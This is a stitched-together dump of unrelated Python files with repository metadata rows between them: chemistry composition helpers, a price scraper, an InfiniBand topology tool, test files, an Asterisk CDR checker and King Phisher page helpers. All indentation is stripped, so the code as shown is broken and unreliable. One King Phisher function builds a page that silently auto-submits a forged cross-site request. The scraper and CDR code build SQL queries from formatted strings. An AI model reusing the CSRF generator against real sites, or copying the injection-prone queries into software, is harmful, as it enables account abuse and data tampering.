CHEMICAL_FORMULA_PATTERN = re.compile(r"([A-Z][a-z]?)([0-9\.]*)")
def process_wildcard(fractions):
"""
Processes element with a wildcard ``?`` weight fraction and returns
composition balanced to 1.0.
"""
wildcard_zs = set()
total_fraction = 0.0
for z, fraction in fractions.items():
if fraction == "?":
wildcard_zs.add(z)
else:
total_fraction += fraction
if not wildcard_zs:
return fractions
balance_fraction = (1.0 - total_fraction) / len(wildcard_zs)
for z in wildcard_zs:
fractions[z] = balance_fraction
return fractions
def convert_mass_to_atomic_fractions(mass_fractions):
"""
Converts a mass fraction :class:`dict` to an atomic fraction :class:`dict`.
Args:
mass_fractions (dict): mass fraction :class:`dict`.
The composition is specified by a dictionary.
The keys are atomic numbers and the values weight fractions.
No wildcard are accepted.
"""
atomic_fractions = {}
for z, mass_fraction in mass_fractions.items():
atomic_fractions[z] = mass_fraction / pyxray.element_atomic_weight(z)
total_fraction = sum(atomic_fractions.values())
for z, fraction in atomic_fractions.items():
try:
atomic_fractions[z] = fraction / total_fraction
except ZeroDivisionError:
atomic_fractions[z] = 0.0
return atomic_fractions
def convert_atomic_to_mass_fractions(atomic_fractions):
"""
Converts an atomic fraction :class:`dict` to a mass fraction :class:`dict`.
Args:
atomic_fractions (dict): atomic fraction :class:`dict`.
The composition is specified by a dictionary.
The keys are atomic numbers and the values atomic fractions.
No wildcard are accepted.
"""
# Calculate total atomic mass
atomic_masses = {}
total_atomic_mass = 0.0
for z, atomic_fraction in atomic_fractions.items():
atomic_mass = pyxray.element_atomic_weight(z)
atomic_masses[z] = atomic_mass
total_atomic_mass += atomic_fraction * atomic_mass
# Create mass fraction
mass_fractions = {}
for z, atomic_fraction in atomic_fractions.items():
mass_fractions[z] = atomic_fraction * atomic_masses[z] / total_atomic_mass
return mass_fractions
def convert_formula_to_atomic_fractions(formula):
"""
Converts a chemical formula to an atomic fraction :class:`dict`.
Args:
formula (str): chemical formula, like Al2O3. No wildcard are accepted.
"""
mole_fractions = {}
total_mole_fraction = 0.0
for match in CHEMICAL_FORMULA_PATTERN.finditer(formula):
symbol, mole_fraction = match.groups()
z = pyxray.element_atomic_number(symbol.strip())
if mole_fraction == "":
mole_fraction = 1.0
mole_fraction = float(mole_fraction)
mole_fraction = float(mole_fraction)
mole_fractions[z] = mole_fraction
total_mole_fraction += mole_fraction
# Calculate atomic fractions
atomic_fractions = {}
for z, mole_fraction in mole_fractions.items():
atomic_fractions[z] = mole_fraction / total_mole_fraction
return atomic_fractions
def generate_name(atomic_fractions):
"""
Generates a name from the composition.
The name is generated on the basis of a classical chemical formula.
"""
if not atomic_fractions:
return ""
if len(atomic_fractions) == 1:
z = list(atomic_fractions.keys())[0]
return pyxray.element_symbol(z)
symbols = []
fractions = []
for z in sorted(atomic_fractions.keys(), reverse=True):
symbols.append(pyxray.element_symbol(z))
fractions.append(Fraction(atomic_fractions[z]).limit_denominator())
# Find gcd of the fractions
gcds = []
for a, b in itertools.combinations(fractions, 2):
gcds.append(math.gcd(a.denominator, b.denominator))
smallest_gcd = min(gcds)
# Write formula
name = ""
for symbol, fraction in zip(symbols, fractions):
mole_fraction = int(fraction * smallest_gcd)
if mole_fraction == 0:
continue
elif mole_fraction == 1:
name += "%s" % symbol
else:
name += "%s%i" % (symbol, mole_fraction)
return name
class Composition:
"""
Defines a composition of a compound.
To create a composition, use the class methods:
- :meth:`from_pure`
- :meth:`from_formula`
- :meth:`from_mass_fractions`
- :meth:`from_atomic_fractions`
Use the following attributes to access the composition values:
- :attr:`mass_fractions`: :class:`dict` where the keys are atomic numbers and the values weight fractions.
- :attr:`atomic_fractions`: :class:`dict` where the keys are atomic numbers and the values atomic fractions.
- :attr:`formula`: chemical formula
The composition object is immutable, i.e. it cannot be modified once created.
Equality can be checked.
It is hashable.
It can be pickled or copied.
"""
_key = object()
PRECISION = 0.000000001 # 1ppb
def __init__(self, key, mass_fractions, atomic_fractions, formula):
"""
Private constructor. It should never be used.
"""
if key != Composition._key:
raise TypeError("Composition cannot be created using constructor")
if set(mass_fractions.keys()) != set(atomic_fractions.keys()):
raise ValueError("Mass and atomic fractions must have the same elements")
self.mass_fractions = MappingProxyType(mass_fractions)
self.atomic_fractions = MappingProxyType(atomic_fractions)
self._formula = formula
@classmethod
def from_pure(cls, z):
"""
Creates a pure composition.
Args:
z (int): atomic number
"""
return cls(cls._key, {z: 1.0}, {z: 1.0}, pyxray.element_symbol(z))
@classmethod
def from_formula(cls, formula):
"""
Creates a composition from a chemical formula.
Args:
formula (str): chemical formula
"""
atomic_fractions = convert_formula_to_atomic_fractions(formula)
return cls.from_atomic_fractions(atomic_fractions)
@classmethod
def from_mass_fractions(cls, mass_fractions, formula=None):
"""
Creates a composition from a mass fraction :class:`dict`.
Args:
mass_fractions (dict): mass fraction :class:`dict`.
The keys are atomic numbers and the values weight fractions.
Wildcard are accepted, e.g. ``{5: '?', 25: 0.4}`` where boron
will get a mass fraction of 0.6.
formula (str): optional chemical formula for the composition.
If ``None``, a formula will be generated for the composition.
"""
mass_fractions = process_wildcard(mass_fractions)
atomic_fractions = convert_mass_to_atomic_fractions(mass_fractions)
if not formula:
formula = generate_name(atomic_fractions)
return cls(cls._key, mass_fractions, atomic_fractions, formula)
@classmethod
def from_atomic_fractions(cls, atomic_fractions, formula=None):
"""
Creates a composition from an atomic fraction :class:`dict`.
Args:
atomic_fractions (dict): atomic fraction :class:`dict`.
The keys are atomic numbers and the values atomic fractions.
Wildcard are accepted, e.g. ``{5: '?', 25: 0.4}`` where boron
will get a atomic fraction of 0.6.
formula (str): optional chemical formula for the composition.
If ``None``, a formula will be generated for the composition.
"""
atomic_fractions = process_wildcard(atomic_fractions)
mass_fractions = convert_atomic_to_mass_fractions(atomic_fractions)
if not formula:
formula = generate_name(atomic_fractions)
return cls(cls._key, mass_fractions, atomic_fractions, formula)
def __len__(self):
return len(self.mass_fractions)
def __contains__(self, z):
return z in self.mass_fractions
def __iter__(self):
return iter(self.mass_fractions.keys())
def __repr__(self):
return "<{}({})>".format(self.__class__.__name__, self.inner_repr())
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if len(self) != len(other):
return False
for z in self.mass_fractions:
if z not in other.mass_fractions:
return False
fraction = self.mass_fractions[z]
other_fraction = other.mass_fractions[z]
if not math.isclose(fraction, other_fraction, abs_tol=self.PRECISION):
return False
return True
def __ne__(self, other):
return not self == other
def __hash__(self):
out = []
for z in sorted(self.mass_fractions):
out.append(z)
out.append(int(self.mass_fractions[z] / self.PRECISION))
return hash(tuple(out))
def __getstate__(self):
return {
"mass_fractions": dict(self.mass_fractions),
"atomic_fractions": dict(self.atomic_fractions),
"formula": self.formula,
}
def __setstate__(self, state):
self.mass_fractions = MappingProxyType(state.get("mass_fractions", {}))
self.atomic_fractions = MappingProxyType(state.get("atomic_fractions", {}))
self._formula = state.get("formula", "")
def is_normalized(self):
return math.isclose(
sum(self.mass_fractions.values()), 1.0, abs_tol=self.PRECISION
)
def inner_repr(self):
return ", ".join(
"{}: {:.4f}".format(pyxray.element_symbol(z), mass_fraction)
for z, mass_fraction in self.mass_fractions.items()
)
@property
def formula(self):
return self._formula
| mit | 43,317,252,037,900,280 | 30.412121 | 116 | 0.613737 | false | 3.957999 | false | false | false |
sergiosvieira/cstore-warning | main.py | 1 | 4521 | #!env/bin/python
import requests
import lxml.html
import pprint
from sqlite3 import dbapi2 as sqlite3
def get_table():
payload = {
'keys': '',
'srch_disp': 1,
'srch_fab': -1,
'sec': 'busca.php',
'Submit': 'eviou',
'srch_from': '',
'srch_withctg': 'true',
'srch_pos': '#lista',
'srch_ctg': '-1',
'srch_sctg': '-1',
'out_format': 'Y',
'srch_val': '',
'srch_val2': '',
'Submit2.x': '12',
'Submit2.y': '13'
}
url = 'http://www.cstore.com.br/busca.php'
response = requests.get(url, params=payload)
return response.text
def create_list(text):
root = lxml.html.fromstring(text)
result = root.xpath("//tr//td//text()")
result = [item.strip() for item in result]
result = [item for item in result if len(item) > 0]
return result
def chunks(a_list, a_size):
return [a_list[item:item+a_size] for item in range(0, len(a_list), a_size)]
"""DATABASE"""
def connect_db(a_database_name):
"""Connects to the specific database."""
rv = sqlite3.connect(a_database_name)
rv.row_factory = sqlite3.Row
return rv
def close_db(a_connection):
a_connection.close()
def show_entries(a_connection):
cur = a_connection.execute('SELECT * FROM products ORDER BY product_id DESC')
return cur.fetchall()
def show_product(a_connection, a_product_id):
cur = a_connection.execute('SELECT * FROM products WHERE product_id = "%s"' % (a_product_id))
return cur.fetchall()
def add_entry(a_connection, a_product_id, a_title, a_price, a_available, a_difference):
sql = 'INSERT INTO products (product_id, title, price, available, current_difference) VALUES ("%s", "%s", %f, "%s", %f)' % (a_product_id, a_title, a_price, a_available, a_difference)
cur = a_connection.execute(sql)
def add_history(a_connection, a_product_id, a_price, a_available):
sql = 'INSERT INTO history (product_id, price, available) VALUES ("%s", %f, "%s")' % (a_product_id, a_price, a_available)
a_connection.execute(sql)
def update_entry(a_connection, a_product_id, a_title, a_price, a_available, a_difference):
sql = 'UPDATE products set title="%s", price=%f, available="%s", current_difference=%f WHERE product_id = "%s"' % (a_title, a_price, a_available, a_difference, a_product_id)
print(sql)
a_connection.execute(sql)
def print_update_entry(a_db, a_product_id, a_title, a_old_price, a_new_price, a_difference, a_available):
print("[%s] - %s - O.P: %f - N.P: %f - %f - [%s]" % (a_product_id, a_title, a_old_price, a_new_price, a_difference, a_available))
update_entry(a_db, a_product_id, a_title, a_new_price, a_available, a_difference)
a_db.commit()
add_history(a_db, a_product_id, a_old_price, a_available)
a_db.commit()
def main():
print("Getting products list...")
rows = create_list(get_table())
rows = rows[6:]
print("Spliting list...")
rows = chunks(rows, 5)
print("Database...")
db = connect_db('cstore.db')
counter_updates = 0
counter_adds = 0
for row in rows:
# remote values
product_id = row[0]
title = row[1].replace('"', '')
price = row[2].replace('.', '')
price = float(price.replace(',', '.'))
available = row[3]
# local values
query = show_product(db, product_id)
if len(query) == 0:
print("[New Product]")
print("[%s] - %s - %f - [%s]" % (product_id, title, price, available))
print()
add_entry(db, product_id, title.replace('"',''), price, available, 0.)
counter_adds += 1
else:
q_product_id = query[-1][1]
q_title = query[-1][2].replace('"', '')
q_price = query[-1][3]
q_available = query[-1][4]
diff = price - q_price
if (int(diff) != 0) or (available != q_available):
print(available, q_available)
if int(diff) != 0:
print("[Updated Price]", end='')
if available != q_available:
print("[Updated Availability]", end='')
print()
print_update_entry(db, product_id, q_title, price, q_price, diff, q_available)
print()
counter_updates += 1
db.commit()
close_db(db)
print("Updated Products =", counter_updates)
print("Added Products =", counter_adds)
if __name__ == '__main__':
main()
| apache-2.0 | -1,859,665,363,803,991,300 | 35.168 | 186 | 0.568458 | false | 3.25018 | false | false | false |
jabl/ibtopo2dot | src/ibtopotool.py | 2 | 7667 | #!/usr/bin/env python3
# -*- mode: python; -*-
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8
"""
ibtopotool, a tool to do things with Infiniband topology.
Copyright (C) 2013-2020 Janne Blomqvist
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
import networkx as nx
def speed2weight(speed):
"""Convert an IB speed to an edge weight
See e.g. https://en.wikipedia.org/wiki/InfiniBand
"""
ss = speed.split('x')
nlinks = int(ss[0])
s1 = ss[1]
if s1 == 'SDR':
s = 2
elif s1 == 'DDR':
s = 4
elif s1 == 'QDR':
s = 8
elif s1 == 'FDR10':
s = 10 # ???
elif s1 == 'FDR':
s = 13.64
elif s1 == 'EDR':
s = 24.24
elif s1 == 'HDR':
s = 50 # roughly??
elif s1 == 'NDR':
s = 100 # roughly?
elif s1 == 'XDR':
s = 250 # the future?
else:
raise NotImplementedError('Support for Infiniband speed %s not implemented' % s1)
return nlinks * s
def parse_ibtopo(topofile, shortlabel):
"""
Parse an Infiniband topology file as generated by ibnetdiscover.
Returns: A networkx graph representing the IB network
"""
g = nx.DiGraph()
switchidx = 0 # Index switches sequentially
with open(topofile, 'r') as f:
inblock = False # Switch or Host (Channel Adapter) block
for line in f:
if line.startswith('Switch'):
inblock = True
guid = line.split()[2][1:-1]
i = line.index('#')
s = line[i:].split('"')
nodedesc = s[1]
sid = "s%d" % switchidx
if shortlabel:
label = sid
else:
label = "%s\n%s" % (guid, nodedesc)
g.add_node(guid, desc=nodedesc, type='Switch', label=label)
switchidx += 1
elif line.startswith('Ca'):
inblock = True
guid = line.split()[2][1:-1]
i = line.index('#')
s = line[i:].split('"')
nodedesc = s[1].split()[0]
g.add_node(guid, label=nodedesc, type='Host')
elif len(line) == 0 or line.isspace():
inblock = False
elif inblock:
ls = line.split()
destguid = ls[1].split('"')[1]
w = speed2weight(ls[-1])
# If the edge already exists, add the weigth to it
try:
g[guid][destguid]['weight'] += w
g[guid][destguid]['penwidth'] += 1
except KeyError:
g.add_edge(guid, destguid, weight=w)
g[guid][destguid]['penwidth'] = 1
return g
def gen_dot(graph, out):
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, out)
def gen_slurm(g, out):
"""
g: A networkx graph representing the IB network
out: Output file-like object
"""
try:
import hostlist
except ImportError:
print("""To generate a slurm topology.conf, you need to install
python-hostlist, https://pypi.python.org/pypi/python-hostlist""")
raise
out.write('# topology.conf generated by ibtopo2dot.py\n')
for n, nbrs in g.adjacency():
if g.nodes[n]['type'] == 'Switch':
switches = []
nodes = []
for nbr in nbrs:
if g.nodes[nbr]['type'] == 'Switch':
switches.append(g.nodes[nbr]['label'])
else:
nodename = g.nodes[nbr]['label']
nodes.append(nodename)
switchstring = ""
if len(switches) > 0:
switches.sort()
switchstring = " Switches=" + hostlist.collect_hostlist(switches)
nodestr = ''
if len(nodes) > 0:
nodes.sort()
nodestr = " Nodes=" + hostlist.collect_hostlist(nodes)
out.write('SwitchName=%s%s%s\n' % (g.nodes[n]['label'],
switchstring, nodestr))
def treeify(g, rootfile):
"""Generate a DAG with roots given in the file rootfile"""
roots = []
with open(rootfile, 'r') as f:
for line in f:
l = line.strip()
if l.startswith('#') or len(l) == 0:
continue
ii = l.find('#')
if ii >= 1:
l = l[:ii].rstrip()
roots.append(l)
for root in roots:
# Mark the roots with color for graphviz
g.nodes[root]['fillcolor'] = 'red'
g.nodes[root]['style'] = 'filled'
# Mark the roots as roots for graphviz
g.nodes[root]['root'] = 'true'
g.nodes[root]['rank'] = 0
# Calculate distance from roots for all nodes
for n in g.nodes():
if n in roots:
continue
l = []
for root in roots:
l.append(nx.shortest_path_length(g, n, root))
g.nodes[n]['rank'] = min(l)
# Drop all edges that go towards the roots, based on the ranks we
# just computed
todel = []
for n, nbrs in g.adjacency():
for nbr in nbrs:
if g.nodes[n]['rank'] > g.nodes[nbr]['rank']:
todel.append((n, nbr))
g.remove_edges_from(todel)
return g
def only_switches(g):
"""Filter out nodes that are not switches"""
return g.subgraph([n for n, attrs in g.node.items() if attrs['type']
== 'Switch'])
def relabel_switch_tree(g):
"""If shortlabels and treeify is in effect, relabel switches taking
into account the rank (distance from root(s)) in the tree.
"""
srl = {} # rank:labelindex dict
for n in g.nodes():
if g.nodes[n]['type'] == 'Switch':
r = g.nodes[n]['rank']
if not r in srl:
srl[r] = 0
g.nodes[n]['label'] = 's%d-%d' % (r, srl[r])
srl[r] += 1
if __name__ == '__main__':
from optparse import OptionParser
import sys
usage = """%prog [options] ibtopofile
ibtopofile is a file containing the output of 'ibnetdiscover'."""
parser = OptionParser(usage)
parser.add_option('-s', '--switches', dest='switches',
action='store_true',
help='Include only switch nodes')
parser.add_option('-o', '--output', dest='output',
help='Output file, if omitted stdout')
parser.add_option('--slurm', dest='slurm', action='store_true',
help='Output in slurm topology.conf format. Implies --shortlabels.')
parser.add_option('-t', '--treeify', dest='treeify',
help="Give a file containing GUID's for spine switches")
parser.add_option('--shortlabels', dest='shortlabels', action='store_true',
help='Use short labels for switches')
(options, args) = parser.parse_args()
if len(args) == 0:
parser.print_help()
sys.exit(1)
if options.slurm:
options.shortlabels = True
graph = parse_ibtopo(args[0], options.shortlabels)
if options.output:
out = open(options.output, 'w')
else:
out = sys.stdout
if options.switches:
graph = only_switches(graph)
if options.treeify:
graph = treeify(graph, options.treeify)
if options.shortlabels:
relabel_switch_tree(graph)
if options.slurm:
gen_slurm(graph, out)
else:
gen_dot(graph, out)
| mit | 256,450,862,748,284,500 | 32.190476 | 90 | 0.520673 | false | 3.758333 | false | false | false |
maehler/seqpoet | seqpoet/tests/test_search.py | 1 | 2437 | from collections import defaultdict
import os
from nose.tools import raises
from nose.plugins.skip import SkipTest
from seqpoet.search import search, hamming_distance
from seqpoet import Sequence
from seqpoet import GenBank
from seqpoet.genbank import Location
class TestHammingDistance:
@raises(ValueError)
def test_sequences_of_different_length(self):
hamming_distance('gattaca', 'gatt')
def test_wikipedia_examples(self):
assert hamming_distance('karolin', 'kathrin') == 3
assert hamming_distance('karolin', 'kerstin') == 3
assert hamming_distance('1011101', '1001001') == 2
assert hamming_distance('2173896', '2233796') == 3
def test_exact_matches(self):
assert hamming_distance('karolin', 'karolin') == 0
assert hamming_distance('gattaca', 'gattaca') == 0
def test_one_mismatch(self):
assert hamming_distance('niklas', 'niclas') == 1
class TestSearch:
def setUp(self):
self.haystack = 'accgtgacgggcacgaggcatcattatctagcagcacatg'
self.needle = 'gaggcat'
self.genbankdir = os.path.join(os.path.expanduser('~'), 'Dropbox',
'operon_extractor', 'data_genbank')
self.lmg718 = os.path.join(self.genbankdir, 'LMG718-cremoris.gb')
def test_exact_match(self):
res = search(self.needle, self.haystack)
assert res == [14], 'expected one match in pos 14, found {0}' \
.format(str(res))
def test_one_mismatch(self):
res = search(self.needle, self.haystack, mismatches=1)
assert res == [14], 'expected one match in pos 14, found {0}' \
.format(str(res))
res = search('ggg', self.haystack, mismatches=1)
assert res == [3, 7, 8, 9, 14, 15, 16], 'found {0}'.format(str(res))
def test_search_genbank(self):
if not os.path.exists(self.genbankdir):
raise SkipTest
gb = GenBank(self.lmg718)
with open(os.path.join(self.genbankdir, '..', 'primers.txt')) as f:
probe = Sequence(f.readline().strip())
matches = defaultdict(list)
for locus in gb:
matches[locus.name].extend(search(str(probe), str(locus.seq), mismatches=0))
for locus, starts in matches.iteritems():
for s in starts:
for gbl in gb.get_locus_from_name(locus):
assert gbl.seq[s:s + len(probe)] == probe
| mit | -7,515,088,048,089,271,000 | 34.318841 | 88 | 0.620845 | false | 3.375346 | true | false | false |
asterisk/testsuite | tests/cdr/sqlite3/cdr_sqlite3.py | 2 | 4801 | #!/usr/bin/env python
"""Pluggable module for the sqlite3 test
Copyright (C) 2013, Digium, Inc.
Matt Jordan <[email protected]>
This program is free software, distributed under the terms of
the GNU General Public License Version 2.
"""
import sys
import logging
import sqlite3
import re
sys.path.append("lib/python")
from asterisk.config import ConfigFile
LOGGER = logging.getLogger(__name__)
class CDRSQLite3Verifier(object):
"""A class that verifies CDRs in SQLite3 records"""
def __init__(self, module_config, test_object):
"""Constructor"""
self.module_config = module_config
self.test_object = test_object
# Hook ourselves onto the test object
test_object.register_stop_observer(self.check_cdr_records)
def verify_record(self, actual, expected):
"""Verify two records are the same
Note that we allow fields in actual to exist that aren't
in expected. Every field in expected should exist in the
actual record.
Keyword Arguments:
actual The actual record retrieved
expected The expected record
Returns:
True if the two records are a match
False otherwise
"""
for expected_key, expected_value in expected.items():
if expected_key not in actual:
LOGGER.debug("Field %s is not in actual record" % expected_key)
return False
actual_value = actual[expected_key]
if not re.match(expected_value.lower(),
actual_value.strip().lower()):
LOGGER.debug("Field %s: actual %s != expected %s" %
(expected_key, actual_value, expected_value))
return False
return True
def get_sqlite_config(self, ast_instance):
"""Retrieve necessary SQLite3 config parameters from the config file
Keyword Arguments:
ast_instance The instance of Asterisk that used the config file
Returns:
Tuple of (table, columns)
"""
sqlite_config_file = ("%s/%s/cdr_sqlite3_custom.conf" %
(ast_instance.base,
ast_instance.directories['astetcdir']))
sqlite_config = ConfigFile(sqlite_config_file)
for option in sqlite_config.categories[0].options:
if option[0] == 'table':
table = option[1]
elif option[0] == 'columns':
columns = [col.strip() for col in option[1].split(',')]
return (table, columns)
def check_cdr_records(self, callback_param):
"""A deferred callback method that is called by the TestCase
derived object when all Asterisk instances have stopped
Parameters:
callback_param
"""
overall_success = []
for instance in self.module_config:
instance = instance or {}
ast_index = instance.get('asterisk-instance') or 0
database = instance.get('database') or 'master.db'
lines = instance.get('lines')
if not lines:
LOGGER.warning('No expected CDR entries in config?')
continue
ast_instance = self.test_object.ast[ast_index]
LOGGER.debug("Checking CDR records from %s" % ast_instance.host)
table, columns = self.get_sqlite_config(ast_instance)
sqlite_database = "%s/%s/%s" % (ast_instance.base,
ast_instance.directories['astlogdir'],
database)
conn = sqlite3.connect(sqlite_database)
cursor = conn.cursor()
cursor.execute("SELECT %s FROM %s" % (','.join(columns), table))
entries = cursor.fetchall()
# Convert each SQL result to a dictionary of columns, values
cdr_entries = [dict(zip(columns, list(entry))) for entry in entries]
if len(cdr_entries) != len(lines):
LOGGER.error("Expected entries %d != actual number %d" %
(len(lines), len(cdr_entries)))
overall_success.append(False)
continue
# Test each against the expected
for cdr_entry in cdr_entries:
new_lines = [line for line in lines if
not self.verify_record(cdr_entry, line)]
success = (len(new_lines) != len(lines))
if not success:
LOGGER.error("CDR record %s failed to match any expected" %
str(cdr_entry))
overall_success.append(success)
lines = new_lines
conn.close()
self.test_object.set_passed(all(overall_success))
return callback_param
| gpl-2.0 | -2,931,895,642,497,996,300 | 31.883562 | 80 | 0.576963 | false | 4.466047 | true | false | false |
0x0mar/king-phisher | king_phisher/server/pages.py | 1 | 3685 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/server/pages.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
import markupsafe
from king_phisher import utilities
if sys.version_info[0] < 3:
import cgi as html
else:
import html
def make_csrf_page(url, params, method='POST'):
"""
A Jinja function which will create an HTML page that will automatically
perform a CSRF attack against another page.
:param str url: The URL to use as the form action.
:param dict params: The parameters to send in the forged request.
:param str method: The HTTP method to use when submitting the form.
"""
escape = lambda s: html.escape(s, quote=True)
form_id = utilities.random_string(12)
page = []
page.append('<!DOCTYPE html>')
page.append('<html lang="en-US">')
page.append(" <body onload=\"document.getElementById(\'{0}\').submit()\">".format(form_id))
page.append(" <form id=\"{0}\" action=\"{1}\" method=\"{2}\">".format(form_id, escape(url), escape(method)))
for key, value in params.items():
page.append(" <input type=\"hidden\" name=\"{0}\" value=\"{1}\" />".format(escape(key), escape(value)))
page.append(' </form>')
page.append(' </body>')
page.append('</html>')
page = '\n'.join(page)
return markupsafe.Markup(page)
def make_redirect_page(url, title='Automatic Redirect'):
"""
A Jinja function which will create an HTML page that will automatically
redirect the viewer to a different url.
:param str url: The URL to redirect the user to.
:param str title: The title to use in the resulting HTML page.
"""
title = html.escape(title, quote=True)
url = html.escape(url, quote=True)
page = []
page.append('<!DOCTYPE html>')
page.append('<html lang="en-US">')
page.append(' <head>')
page.append(" <title>{0}</title>".format(title))
page.append(" <meta http-equiv=\"refresh\" content=\"0;url={0}\" />".format(url))
page.append(' </head>')
page.append(' <body>')
page.append(" <p>The content you are looking for has been moved. If you are not redirected automatically then <a href=\"{0}\">click here</a> to proceed.</p>".format(url))
page.append(' </body>')
page.append('</html>')
page = '\n'.join(page)
return markupsafe.Markup(page)
| bsd-3-clause | 9,211,992,379,730,732,000 | 38.202128 | 174 | 0.710176 | false | 3.550096 | false | false | false |
titilambert/teeawards | old/controllers/ladder.py | 1 | 2145 | from bottle import mako_view, request, response, redirect
from libs.lib import get_player_list
from libs.lib import job_list
from libs.rank import get_rank
from libs.teeworldsserver import twms
from libs.hooks import *
@mako_view('ladder')
@prepare_context
def ladder(sort='score', context={}, gametype=None):
context['page'] = 'ladder'
context['sort'] = sort
if sort not in ['kills', 'suicides', 'deaths', 'score', 'ratio', 'nickname']:
redirect("/ladder")
stats_by_players = []
players = get_player_list()
for player in players:
tmp_dict = {}
# Killer
killjob = getattr(job_list['KillsJob'], 'KillsJob')()
killjob.set_gametype(gametype)
killjob.set_player_name(player)
kills = killjob.get_results()
tmp_dict['kills'] = kills
# Ratio
ratiojob = getattr(job_list['RatiosJob'], 'RatiosJob')()
ratiojob.set_gametype(gametype)
ratiojob.set_player_name(player)
ratio = ratiojob.get_results()
tmp_dict['ratio'] = ratio
# Victim
deathjob = getattr(job_list['DeathsJob'], 'DeathsJob')()
deathjob.set_gametype(gametype)
deathjob.set_player_name(player)
deaths = deathjob.get_results()
tmp_dict['deaths'] = deaths
# Suicider
suicidejob = getattr(job_list['SuicidesJob'], 'SuicidesJob')()
suicidejob.set_gametype(gametype)
suicidejob.set_player_name(player)
suicides = suicidejob.get_results()
tmp_dict['suicides'] = suicides
# Score
tmp_dict['score'] = 0
# Rank
tmp_dict['rank'] = get_rank(player, tmp_dict['score'])
# Save stats
stats_by_players.append((player, tmp_dict))
if sort == 'nickname':
context['stats_by_players'] = sorted([x for x in stats_by_players],
key=lambda x: x[0])
else:
context['stats_by_players'] = sorted([x for x in stats_by_players],
key=lambda x: x[1][sort],
reverse=True)
return context
| agpl-3.0 | 5,629,841,001,260,326,000 | 32.515625 | 81 | 0.578555 | false | 3.465267 | false | false | false |
jefftc/changlab | Betsy/Betsy/modules/annotate_genes_with_david.py | 1 | 4588 | from Module import AbstractModule
class Module(AbstractModule):
def __init__(self):
AbstractModule.__init__(self)
def run(
self, network, antecedents, out_attributes, user_options, num_cores,
outfile):
from genomicode import arrayplatformlib
from genomicode import filelib
f = file(antecedents.identifier, 'r')
text = f.read()
f.close()
in_list = text.split()
# guess the idType
chipname = arrayplatformlib.identify_platform_of_annotations(in_list)
assert chipname in platform2idtype, \
'David does not handle %s' % chipname
idType = platform2idtype[chipname]
# convert the platform to idtype
DAVIDenrich(in_list, idType, outfile)
assert filelib.exists_nz(outfile), (
'the outfile for run_david %s does not exist' % outfile
)
def name_outfile(self, antecedents, user_options):
from Betsy import module_utils
original_file = module_utils.get_inputid(antecedents.identifier)
filename = 'david_' + original_file + '.tdf'
return filename
def DAVIDenrich(
in_list, idType, outfile, bg_list=[], bgName='Background1',
listName='List1', category='', thd=0.1, ct=2):
from suds.client import Client
assert len(in_list) < 3000, (
'the number of genes to David cannot exceed 3000'
)
if len(in_list) > 0:
inputListIds = ','.join(in_list)
else:
raise
flagBg = False
if len(bg_list) > 0:
inputBgIds = ','.join(bg_list)
flagBg = True
x = str('http://david.abcc.ncifcrf.gov/') + str(
'webservice/services/DAVIDWebService?wsdl')
client = Client(x)
client.service.authenticate('[email protected]')
listType = 0
client.service.addList(inputListIds, idType, listName, listType)
if flagBg:
listType = 1
client.service.addList(inputBgIds, idType, bgName, listType)
client.service.setCategories(category)
chartReport = client.service.getChartReport(thd, ct)
with open(outfile, 'w') as fOut:
header = ['Category', 'Term', 'Count', '%', 'Pvalue', 'Genes',
'List Total', 'Pop Hits', 'Pop Total', 'Fold Enrichment',
'Bonferroni', 'Benjamini', 'FDR\n']
fOut.write('\t'.join(header))
for row in chartReport:
rowDict = dict(row)
categoryName = str(rowDict['categoryName'])
termName = str(rowDict['termName'])
listHits = str(rowDict['listHits'])
percent = str(rowDict['percent'])
ease = str(rowDict['ease'])
Genes = str(rowDict['geneIds'])
listTotals = str(rowDict['listTotals'])
popHits = str(rowDict['popHits'])
popTotals = str(rowDict['popTotals'])
foldEnrichment = str(rowDict['foldEnrichment'])
bonferroni = str(rowDict['bonferroni'])
benjamini = str(rowDict['benjamini'])
FDR = str(rowDict['afdr'])
rowList = [categoryName, termName, listHits, percent, ease, Genes,
listTotals, popHits, popTotals, foldEnrichment,
bonferroni, benjamini, FDR]
fOut.write('\t'.join(rowList) + '\n')
platform2idtype = {
'MG_U74Av2': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133_Plus_2': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mu11KsubA': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mu11KsubB': 'AFFYMETRIX_3PRIME_IVT_ID',
'Hu6800': 'AFFYMETRIX_3PRIME_IVT_ID',
'HG_U133B': 'AFFYMETRIX_3PRIME_IVT_ID',
'Mouse430_2': 'AFFYMETRIX_3PRIME_IVT_ID',
